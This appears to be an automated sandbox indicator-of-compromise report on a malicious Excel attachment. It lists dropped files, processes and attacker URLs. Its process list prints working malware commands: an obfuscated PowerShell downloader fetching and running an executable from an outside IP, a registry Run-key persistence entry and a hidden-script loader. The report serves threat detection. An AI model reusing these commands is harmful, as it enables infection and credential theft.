IOC Report
PO 11001 .xls

loading gif

Files

File Path
Type
Category
Malicious
PO 11001 .xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun Sep 29 19:08:11 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienetbookinetcahce[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\dllhost.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res
ASCII text, with very long lines (3095), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\Desktop\PO 11001 .xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 08:53:41 2024, Security: 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82C6F378.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF2F4046.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\1p04mv1k.243.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RESA499.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 07:53:31 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESF72C.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 07:53:53 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\afcoe331.g4g.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ambtf0up.cjv.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bhv38BD.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bhv6163.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bhv70BC.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bhv874A.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bhvB54C.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bhvF162.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x22bd091d, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bz5eavq5.fug.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\dalh1k2r.iv5.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\jypyihgkg
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\lpwdliyh.bjz.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\ngs2zpei.e4g.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\r24b1nro.hm0.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\rgnvwzkt.kw3.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\vtxzj5fd.fia.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\w3yxibzn.2ob.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\wm0prvst.ulj.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\wmp1pwio.ywf.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ywcv3dyy.x14.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zivderee.t2i.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zt2rhuiy.1xs.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF8616F0049FEDF9F2.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA90634FEFD6052EC.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFDF9B9914A7405FA0.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LS6LA5XBHLPL7UUT4487.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YS2VA87AF2SC5704UN33.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF6b7df7.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet\brkops.ind
data
dropped
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet\dumrians.und
data
dropped
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Tribades.vir
data
dropped
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Ukr.txt
ASCII text, with very long lines (359), with no line terminators
dropped
C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Valvulate.Cru
data
dropped
C:\Users\user\Desktop\54230000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 08:53:41 2024, Security: 1
dropped
C:\Users\user\Desktop\54230000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Windows\brandbombernes.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
dropped
There are 57 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
malicious
C:\Users\user\AppData\Roaming\dllhost.exe
"C:\Users\user\AppData\Roaming\dllhost.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
malicious
C:\Users\user\AppData\Roaming\dllhost.exe
"C:\Users\user\AppData\Roaming\dllhost.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
"C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\uufpqcznfpbrpkbrchvwvbbgmplrtlta"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wwta"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\hrysrnv"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jypyihgkg"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tsdrjareurci"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\wvibksbfizuvagm"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Frligheden)
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\iwmakfxbvkkvnuhajheo"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\krsslxicrscipavesrrqbfdw"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\vtxdlqtwfaunaojibclrekqfvdn"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\myrqksteqvbcbpuimnlztpdvy"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\xtwidkeyedthlwimexyaecymzxube"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\zvbbddpzsllmnceqnitchhsvidlcgnnv"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\jghbahqihjysxfkijlbzkstdovyth"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\tamubzacvrqfilguawnanwnuwchuixxt"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dcam"
malicious
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\ctsuyeuksgddrommozvfphobcmulr"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
There are 29 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://192.3.220.22/hFXELFSwRHRwqbE214.bin
192.3.220.22
malicious
http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
192.3.220.22
malicious
http://192.3.220.22/430/dllhost.exe
192.3.220.22
malicious
https://og1.in/2Rxzb3yX
unknown
http://192.3.220.22/
unknown
https://og1.in/
unknown
http://ocsp.entrust.net03
unknown
https://og1.in/2Rxzb3Z
unknown
https://contoso.com/License
unknown
https://og1.in/2Rxzb3s
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://192.3.220.22/ic
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://og1.in/2Rxzb3w
unknown
https://og1.in/2Rxzb3
104.21.78.54
http://go.micros
unknown
https://og1.in/2Rxzb3C
unknown
https://www.google.com
unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htahttp://192.3.220.22/xampp/en/cookienetbookine
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://login.yahoo.com/config/login
unknown
http://192.3.220.22/videro
unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta9p
unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaC:
unknown
https://og1.in/2Rxzb3W
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://192.3.220.22/430/dllhost.exe%m
unknown
http://go.cr
unknown
http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaMy
unknown
http://192.3.220.22/430/dllhost.
unknown
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
https://og1.in/2Rxzb3&
unknown
http://go.microso
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://og1.in/ket
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
